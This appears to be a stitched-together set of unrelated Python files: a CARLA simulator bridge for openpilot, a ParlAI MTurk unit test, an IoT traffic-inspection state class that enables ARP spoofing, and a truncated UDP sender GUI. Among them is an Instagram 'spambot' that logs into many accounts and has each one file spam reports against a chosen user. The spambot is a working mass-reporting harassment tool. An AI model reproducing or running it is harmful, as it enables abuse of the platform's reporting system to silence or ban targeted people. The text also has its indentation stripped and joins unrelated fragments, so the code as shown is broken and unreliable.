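# says the same thing in one line; the helper name is hypothetical.
def _work_groups_of_four(dim):
    return (dim + 3) // 4  # equals dim // 4 when dim is already a multiple of 4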
def imu_callback(imu, vehicle_state):
vehicle_state.bearing_deg = math.degrees(imu.compass)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function(exit_event: threading.Event):
pm = messaging.PubMaster(['pandaStates'])
while not exit_event.is_set():
dat = messaging.new_message('pandaStates', 1)
dat.valid = True
dat.pandaStates[0] = {
'ignitionLine': True,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaStates', dat)
time.sleep(0.5)
def peripheral_state_function(exit_event: threading.Event):
pm = messaging.PubMaster(['peripheralState'])
while not exit_event.is_set():
dat = messaging.new_message('peripheralState')
dat.valid = True
# fake peripheral state data
dat.peripheralState = {
'pandaType': log.PandaState.PandaType.blackPanda,
'voltage': 12000,
'current': 5678,
'fanSpeedRpm': 1000
}
pm.send('peripheralState', dat)
time.sleep(0.5)
def gps_callback(gps, vehicle_state):
dat = messaging.new_message('gpsLocationExternal')
# transform vel from carla to NED
# north is -Y in CARLA
velNED = [
-vehicle_state.vel.y, # north/south component of NED is negative when moving south
vehicle_state.vel.x, # positive when moving east, which is x in carla
vehicle_state.vel.z,
]
dat.gpsLocationExternal = {
"timestamp": int(time.time() * 1000),
"flags": 1, # valid fix
"accuracy": 1.0,
"verticalAccuracy": 1.0,
"speedAccuracy": 0.1,
"bearingAccuracyDeg": 0.1,
"vNED": velNED,
"bearingDeg": vehicle_state.bearing_deg,
"latitude": gps.latitude,
"longitude": gps.longitude,
"altitude": gps.altitude,
"speed": vehicle_state.speed,
"source": log.GpsLocationData.SensorSource.ublox,
}
pm.send('gpsLocationExternal', dat)
def fake_driver_monitoring(exit_event: threading.Event):
pm = messaging.PubMaster(['driverState', 'driverMonitoringState'])
while not exit_event.is_set():
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs: VehicleState, exit_event: threading.Event):
i = 0
while not exit_event.is_set():
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged)
time.sleep(0.01)
i += 1
def bridge(q):
# setup CARLA
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(10.0)
world = client.load_world(args.town)
settings = world.get_settings()
settings.synchronous_mode = True # Enables synchronous mode
settings.fixed_delta_seconds = 0.05
world.apply_settings(settings)
world.set_weather(carla.WeatherParameters.ClearSunset)
if args.low_quality:
world.unload_map_layer(carla.MapLayer.Foliage)
world.unload_map_layer(carla.MapLayer.Buildings)
world.unload_map_layer(carla.MapLayer.ParkedVehicles)
world.unload_map_layer(carla.MapLayer.Props)
world.unload_map_layer(carla.MapLayer.StreetLights)
world.unload_map_layer(carla.MapLayer.Particles)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[1]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > args.num_selected_spawn_point, \
f'''No spawn point {args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
spawn_point = spawn_points[args.num_selected_spawn_point]
vehicle = world.spawn_actor(vehicle_bp, spawn_point)
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '40')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.13))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camerad = Camerad()
camera.listen(camerad.cam_callback)
vehicle_state = VehicleState()
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(lambda imu: imu_callback(imu, vehicle_state))
gps_bp = blueprint_library.find('sensor.other.gnss')
gps = world.spawn_actor(gps_bp, transform, attach_to=vehicle)
gps.listen(lambda gps: gps_callback(gps, vehicle_state))
# launch fake car threads
threads = []
exit_event = threading.Event()
threads.append(threading.Thread(target=panda_state_function, args=(exit_event,)))
threads.append(threading.Thread(target=peripheral_state_function, args=(exit_event,)))
threads.append(threading.Thread(target=fake_driver_monitoring, args=(exit_event,)))
threads.append(threading.Thread(target=can_function_runner, args=(vehicle_state, exit_event,)))
for t in threads:
t.start()
# can loop
rk = Ratekeeper(100, print_delay_threshold=0.05)
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0
old_steer = old_brake = old_throttle = 0
throttle_manual_multiplier = 0.7 # keyboard signal is always 1
brake_manual_multiplier = 0.7 # keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO # keyboard signal is always 1
while True:
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0.0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0.0
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "reverse":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
elif m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
elif m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "quit":
break
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
if is_openpilot_engaged:
sm.update(0)
# TODO gas and brake is deprecated
throttle_op = clip(sm['carControl'].actuators.accel / 1.6, 0.0, 1.0)
brake_op = clip(-sm['carControl'].actuators.accel / 4.0, 0.0, 1.0)
steer_op = sm['carControl'].actuators.steeringAngleDeg
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
else:
if throttle_out == 0 and old_throttle > 0:
if throttle_ease_out_counter > 0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out == 0 and old_brake > 0:
if brake_ease_out_counter > 0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out == 0 and old_steer != 0:
if steer_ease_out_counter > 0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1, 1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
vc.throttle = throttle_out / 0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) # in m/s
vehicle_state.speed = speed
vehicle_state.vel = vel
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
if rk.frame % PRINT_DECIMATION == 0:
print("frame: ", "engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "; steer(c/deg): ", round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3))
if rk.frame % 5 == 0:
world.tick()
rk.keep_time()
# Clean up resources in the opposite order they were created.
exit_event.set()
for t in reversed(threads):
t.join()
gps.destroy()
imu.destroy()
camera.destroy()
vehicle.destroy()
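# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the bridge: the Step 2 conversion above maps
# an openpilot steering angle in degrees to CARLA's normalized [-1, 1] steer by
# dividing by max_steer_angle * STEER_RATIO and flipping the sign (the two
# conventions steer in opposite directions). The helper name is hypothetical;
# it reuses the module-level np and STEER_RATIO.
def op_angle_to_carla_steer(steer_deg, max_steer_angle):
    steer_carla = steer_deg / (max_steer_angle * STEER_RATIO * -1)
    return float(np.clip(steer_carla, -1, 1))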
def bridge_keep_alive(q: Any):
while 1:
try:
bridge(q)
break
except RuntimeError:
print("Restarting bridge...")
if __name__ == "__main__":
# make sure params are in a good state
set_params_enabled()
msg = messaging.new_message('liveCalibration')
msg.liveCalibration.validBlocks = 20
msg.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
Params().put("CalibrationParams", msg.to_bytes())
q: Any = Queue()
p = Process(target=bridge_keep_alive, args=(q,), daemon=True)
p.start()
if args.joystick:
# start input poll for joystick
from lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
p.join()
else:
# start input poll for keyboard
from lib.keyboard_ctrl import keyboard_poll_thread
keyboard_poll_thread(q)
|
test_mturk_agent.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import unittest
import os
import time
import threading
from unittest import mock
from parlai.mturk.core.agents import MTurkAgent, AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.worker_manager as WorkerManagerFile
import parlai.mturk.core.data_model as data_model
parent_dir = os.path.dirname(os.path.abspath(__file__))
WorkerManagerFile.DISCONNECT_FILE_NAME = 'disconnect-test.pickle'
WorkerManagerFile.MAX_DISCONNECTS = 1
WorkerManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_MESSAGE
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE, AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING, AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE, AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED, AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
class TestAssignState(unittest.TestCase):
"""Various unit tests for the AssignState class"""
def setUp(self):
self.agent_state1 = AssignState()
self.agent_state2 = AssignState(status=AssignState.STATUS_IN_TASK)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt,
mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
def tearDown(self):
self.mturk_manager.shutdown()
def test_assign_state_init(self):
'''Test proper initialization of assignment states'''
self.assertEqual(self.agent_state1.status, AssignState.STATUS_NONE)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(self.agent_state2.status, AssignState.STATUS_IN_TASK)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
def test_message_management(self):
'''Test message management in an AssignState'''
# Ensure message appends succeed and are idempotent
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 1)
self.agent_state1.append_message(MESSAGE_2)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.assertEqual(len(self.agent_state2.get_messages()), 0)
self.assertIn(MESSAGE_1, self.agent_state1.get_messages())
self.assertIn(MESSAGE_2, self.agent_state1.get_messages())
self.assertEqual(len(self.agent_state1.message_ids), 2)
self.agent_state2.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state2.message_ids), 1)
# Ensure command interactions work as expected
self.agent_state1.set_last_command(COMMAND_1)
self.assertEqual(self.agent_state1.get_last_command(), COMMAND_1)
# Ensure clearing messages acts as intended and doesn't clear agent2
self.agent_state1.clear_messages()
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(len(self.agent_state2.message_ids), 1)
def test_state_handles_status(self):
'''Ensures status updates and is_final are valid'''
for status in statuses:
self.agent_state1.set_status(status)
self.assertEqual(self.agent_state1.get_status(), status)
for status in active_statuses:
self.agent_state1.set_status(status)
self.assertFalse(self.agent_state1.is_final())
for status in complete_statuses:
self.agent_state1.set_status(status)
self.assertTrue(self.agent_state1.is_final())
# TODO update the below once bonus is default
for status in complete_statuses:
self.agent_state1.set_status(status)
text, command = self.agent_state1.get_inactive_command_text()
self.assertIsNotNone(text)
self.assertIsNotNone(command)
class TestMTurkAgent(unittest.TestCase):
"""Various unit tests for the MTurkAgent class"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt.copy(),
mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
self.turk_agent = MTurkAgent(
self.opt.copy(), self.mturk_manager,
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1, TEST_WORKER_ID_1)
def tearDown(self):
self.mturk_manager.shutdown()
disconnect_path = os.path.join(parent_dir, 'disconnect-test.pickle')
if os.path.exists(disconnect_path):
os.remove(disconnect_path)
def test_init(self):
'''Test initialization of an agent'''
self.assertIsNotNone(self.turk_agent.creation_time)
self.assertIsNone(self.turk_agent.id)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertIsNone(self.turk_agent.conversation_id)
self.assertFalse(self.turk_agent.some_agent_disconnected)
self.assertFalse(self.turk_agent.hit_is_expired)
self.assertFalse(self.turk_agent.hit_is_abandoned)
self.assertFalse(self.turk_agent.hit_is_returned)
self.assertFalse(self.turk_agent.hit_is_complete)
self.assertFalse(self.turk_agent.disconnected)
self.assertTrue(self.turk_agent.alived)
def test_state_wrappers(self):
'''Test the mturk agent wrappers around its state'''
for status in statuses:
self.turk_agent.set_status(status)
self.assertEqual(self.turk_agent.get_status(), status)
for status in [
AssignState.STATUS_DONE,
AssignState.STATUS_PARTNER_DISCONNECT
]:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.submitted_hit())
for status in active_statuses:
self.turk_agent.set_status(status)
self.assertFalse(self.turk_agent.is_final())
for status in complete_statuses:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.is_final())
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 1)
self.turk_agent.append_message(MESSAGE_2)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.assertIn(MESSAGE_1, self.turk_agent.get_messages())
self.assertIn(MESSAGE_2, self.turk_agent.get_messages())
# Ensure command interactions work as expected
self.turk_agent.set_last_command(COMMAND_1)
self.assertEqual(self.turk_agent.get_last_command(), COMMAND_1)
self.turk_agent.clear_messages()
self.assertEqual(len(self.turk_agent.get_messages()), 0)
# In task checks
self.turk_agent.conversation_id = 't_12345'
self.assertTrue(self.turk_agent.is_in_task())
self.turk_agent.conversation_id = 'b_12345'
self.assertFalse(self.turk_agent.is_in_task())
def test_connection_id(self):
'''Ensure the connection_id hasn't changed'''
connection_id = "{}_{}".format(
self.turk_agent.worker_id, self.turk_agent.assignment_id)
self.assertEqual(self.turk_agent.get_connection_id(), connection_id)
def test_inactive_data(self):
'''Ensure data packet generated for inactive commands is valid'''
for status in complete_statuses:
self.turk_agent.set_status(status)
data = self.turk_agent.get_inactive_command_data()
self.assertIsNotNone(data['text'])
self.assertIsNotNone(data['inactive_text'])
self.assertEqual(
data['conversation_id'], self.turk_agent.conversation_id)
self.assertEqual(data['agent_id'], TEST_WORKER_ID_1)
def test_status_change(self):
has_changed = False
self.turk_agent.set_status(AssignState.STATUS_ONBOARDING)
def wait_for_status_wrap():
nonlocal has_changed # noqa 999 we don't use python2
self.turk_agent.wait_for_status(AssignState.STATUS_WAITING)
has_changed = True
t = threading.Thread(target=wait_for_status_wrap, daemon=True)
t.start()
self.assertFalse(has_changed)
time.sleep(0.07)
self.assertFalse(has_changed)
self.turk_agent.set_status(AssignState.STATUS_WAITING)
time.sleep(0.07)
self.assertTrue(has_changed)
def test_message_queue(self):
'''Ensure observations and acts work as expected'''
self.mturk_manager.send_message = mock.MagicMock()
self.turk_agent.observe(ACT_1)
self.mturk_manager.send_message.assert_called_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1, ACT_1)
# First act comes through the queue and returns properly
self.assertTrue(self.turk_agent.msg_queue.empty())
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.recieved_packets[MESSAGE_ID_1])
self.assertFalse(self.turk_agent.msg_queue.empty())
returned_act = self.turk_agent.get_new_act_message()
self.assertEqual(returned_act, ACT_1)
# Repeat act is ignored
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.msg_queue.empty())
for i in range(100):
self.turk_agent.put_data(str(i), ACT_1)
self.assertEqual(self.turk_agent.msg_queue.qsize(), 100)
self.turk_agent.flush_msg_queue()
self.assertTrue(self.turk_agent.msg_queue.empty())
# Test non-act messages
blank_message = self.turk_agent.get_new_act_message()
self.assertIsNone(blank_message)
self.turk_agent.disconnected = True
disconnect_message = self.turk_agent.get_new_act_message()
self.turk_agent.disconnected = False
self.assertEqual(disconnect_message['text'],
self.turk_agent.MTURK_DISCONNECT_MESSAGE)
self.turk_agent.hit_is_returned = True
return_message = self.turk_agent.get_new_act_message()
self.assertEqual(
return_message['text'], self.turk_agent.RETURN_MESSAGE)
self.turk_agent.hit_is_returned = False
# Reduce state
self.turk_agent.reduce_state()
self.assertIsNone(self.turk_agent.msg_queue)
self.assertIsNone(self.turk_agent.recieved_packets)
def test_message_acts(self):
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
# non-Blocking check
self.assertIsNone(self.turk_agent.message_request_time)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertEqual(returned_act, ACT_1)
self.mturk_manager.send_command.assert_called_once()
# non-Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
while returned_act is None:
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(
returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
# Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEqual(
returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
if __name__ == '__main__':
unittest.main(buffer=True)
|
host_state.py
|
"""
Global shared state about the host.
"""
import threading
import utils
import time
import sys
CLIENT_VERSION = '1.0.3'
class HostState(object):
def __init__(self):
self.host_ip = None
self.host_mac = None
self.gateway_ip = None
self.packet_processor = None
self.user_key = None
self.secret_salt = None
self.client_version = CLIENT_VERSION
self.persistent_mode = True # Always persistent to remove local Flask
# The following objects might be modified concurrently.
self.lock = threading.Lock()
self.ip_mac_dict = {} # IP -> MAC
self.pending_dhcp_dict = {} # device_id -> hostname
self.pending_resolver_dict = {} # device_id -> resolver_ip
self.pending_dns_dict = {} # (device_id, domain) -> ip_set
self.pending_flow_dict = {} # flow_key -> flow_stats
self.pending_ua_dict = {} # device_id -> ua_set
self.pending_tls_dict_list = [] # List of tls_dict
self.pending_netdisco_dict = {} # device_id -> device_info_list
self.pending_syn_scan_dict = {} # device_id -> port_list
self.status_text = None
self.device_whitelist = []
self.has_consent = False
self.byte_count = 0
self.is_inspecting_traffic = True
self.fast_arp_scan = True # Persists for first 5 mins
self.last_ui_contact_ts = time.time() # ts of /is_inspecting_traffic
self.quit = False
self.spoof_arp = True
# Constantly checks for IP changes on this host
thread = threading.Thread(target=self.update_ip_thread)
thread.daemon = True
thread.start()
def set_ip_mac_mapping(self, ip, mac):
with self.lock:
self.ip_mac_dict[ip] = mac
def get_ip_mac_dict_copy(self):
with self.lock:
return dict(self.ip_mac_dict)
def is_inspecting(self):
with self.lock:
return self.is_inspecting_traffic
def update_ip_thread(self):
prev_gateway_ip = None
prev_host_ip = None
while True:
try:
self.gateway_ip, _, self.host_ip = utils.get_default_route()
except Exception:
pass
# Upon network changes, clear ARP cache.
if self.gateway_ip != prev_gateway_ip or \
self.host_ip != prev_host_ip:
with self.lock:
self.ip_mac_dict = {}
prev_gateway_ip = self.gateway_ip
prev_host_ip = self.host_ip
time.sleep(15)
|
spambot.py
|
from requests.sessions import Session
from requests import get
from random import choice
from multiprocessing import Process
from colorama import init,Style,Fore
BANNER = """
____ __ __ ____ _ _ _ __ __
/ ___| \ \ / / | __ ) | | | | | | \ \ / /
| | \ V / | _ \ | | | | | | \ V /
| |___ | | | |_) | | |_| | | |___ | |
\____| |_| |____/ \___/ |_____| |_|
"""
USER_AGENTS = ["Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0",
"Mozilla/5.0 (Android 4.4; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0",
"Mozilla/5.0 (Windows NT x.y; rv:10.0) Gecko/20100101 Firefox/10.0",
"Mozilla/5.0 (X11; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0",
"Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"]
USER_AGENT = choice(USER_AGENTS)
class Client:
def __init__(self,username,password,proxy):
self.ses = Session()
self.loggedIn = False
self.username = username
self.password = password
self.proxy = proxy
def Login(self):
if self.loggedIn == True:
return None
loginData = {
"password":self.password,
"username":self.username,
"queryParams":"{}"
}
homePageResponse = self.ses.get("https://www.instagram.com/accounts/login/")
loginHeaders = {
"Accept":"*/*",
"Accept-Encoding":"gzip,deflate,br",
"Accept-Language":"en-US,en;q=0.5",
"Connection":"keep-alive",
"Content-Type":"application/x-www-form-urlencoded",
"Host":"www.instagram.com",
"Referer":"https://www.instagram.com/accounts/login/",
"X-Requested-With":"XMLHttpRequest",
"X-Instagram-AJAX":"1",
"User-Agent":USER_AGENT,
"X-CSRFToken":homePageResponse.cookies.get_dict()["csrftoken"],
}
loginCookies = {
"rur":"PRN",
"csrftoken":homePageResponse.cookies.get_dict()["csrftoken"],
"mcd":homePageResponse.cookies.get_dict()["mcd"],
"mid":homePageResponse.cookies.get_dict()["mid"]
}
self.ses.headers.update(loginHeaders)
self.ses.cookies.update(loginCookies)
loginPostResponse = self.ses.post("https://www.instagram.com/accounts/login/ajax/",data=loginData)
if loginPostResponse.status_code == 200 and loginPostResponse.json()["authenticated"] == True:
self.loggedIn = True
mainPageResponse = self.ses.get("https://www.instagram.com/")
self.ses.cookies.update(mainPageResponse.cookies)
def Spam(self,username,userid):
if self.loggedIn == False:
return None
link = "https://www.instagram.com/" + username + "/"
profileGetResponse = self.ses.get(link)
self.ses.cookies.update(profileGetResponse.cookies)
spamHeaders = {
"Accept":"*/*",
"Accept-Encoding":"gzip,deflate,br",
"Accept-Language":"en-US,en;q=0.5",
"Connection":"keep-alive",
"Content-Type":"application/x-www-form-urlencoded",
"DNT":"1",
"Host":"www.instagram.com",
"X-Instagram-AJAX":"2",
"X-Requested-With":"XMLHttpRequest",
"Referer":link,
"User-Agent":USER_AGENT,
"X-CSRFToken":profileGetResponse.cookies.get_dict()["csrftoken"],
}
spamData = {
"reason_id":"1",
"source_name":"profile"
}
self.ses.headers.update(spamHeaders)
spamPostResponse = self.ses.post("https://www.instagram.com/users/"+ userid +"/report/",data=spamData)
if spamPostResponse.status_code == 200 and spamPostResponse.json()["description"] == "Your reports help keep our community free of spam.":
self.ses.close()
return True
else:
return False
def Success(username,shit):
print(Fore.GREEN +"[" + username +"]" + Style.RESET_ALL
+ " " + shit)
def Fail(username,shit):
print(Fore.RED +"[" + username +"]" + Style.RESET_ALL
+ " " + shit)
def Status(shit):
print(Fore.YELLOW +"[ İnsta Spam ]" + Style.RESET_ALL
+ " " + shit)
def DoitAnakin(reportedGuy,reportedGuyID,username,password,proxy):
try:
insta = None
if proxy != None:
insta = Client(username,password,None)
else:
insta = Client(username,password,None)
insta.Login()
result = insta.Spam(reportedGuy,reportedGuyID)
if insta.loggedIn == True and result == True:
Success(username,"Başarıyla SPAM atıldı!")
elif insta.loggedIn == True and result == False:
Fail(username,"Giriş başarılı ama SPAM atılması başarısız!")
elif insta.loggedIn == False:
Fail(username,"Giriş başarısız!")
except:
Fail(username,"Giriş yapılırken hata oluştu!")
if __name__ == "__main__":
init()
userFile = open("userlist.txt","r")
USERS = []
for user in userFile.readlines():
if user.replace("\n","").replace("\r","\n") != "":
USERS.append(user.replace("\n","").replace("\r","\n"))
print(Fore.RED + BANNER + Style.RESET_ALL)
Status(str(len(USERS)) + " Adet Kullanıcı Yüklendi!\n")
reportedGuy = input(Fore.GREEN + "SPAM'lanacak Kişinin Kullanıcı Adı: " + Style.RESET_ALL)
reportedGuyID = input(Fore.GREEN + "SPAM'lanacak Kişinin User ID'si: " + Style.RESET_ALL)
print("")
Status("Saldırı başlatılıyor!\n")
for user in USERS:
p = Process(target=DoitAnakin,args=(reportedGuy,reportedGuyID,user.split(" ")[0],user.split(" ")[1],None))
p.start()
|
gui.py
|
import sys
import random
from multiprocessing import Process
from threading import Thread
from socket import *
from tkinter import *
from tkinter import ttk
from _thread import *
print(sys.version)
class SenderConnection:
def __init__(self):
self.host = None
self.port = None
self.addr = (self.host, self.port)
self.sock = socket(AF_INET, SOCK_DGRAM)
def send_data(self, data):
self.sock.sendto(data, self.addr)
def close(self):
# Close the underlying UDP socket (calling self.close() here would recurse forever).
self.sock.close()
def set_host(self, host):
print(f'Host set to : {host}')
if host:
self.host = host
self.addr = (self.host, self.port)
def set_port(self, port):
print(f'Port set to : {port}')
if port:
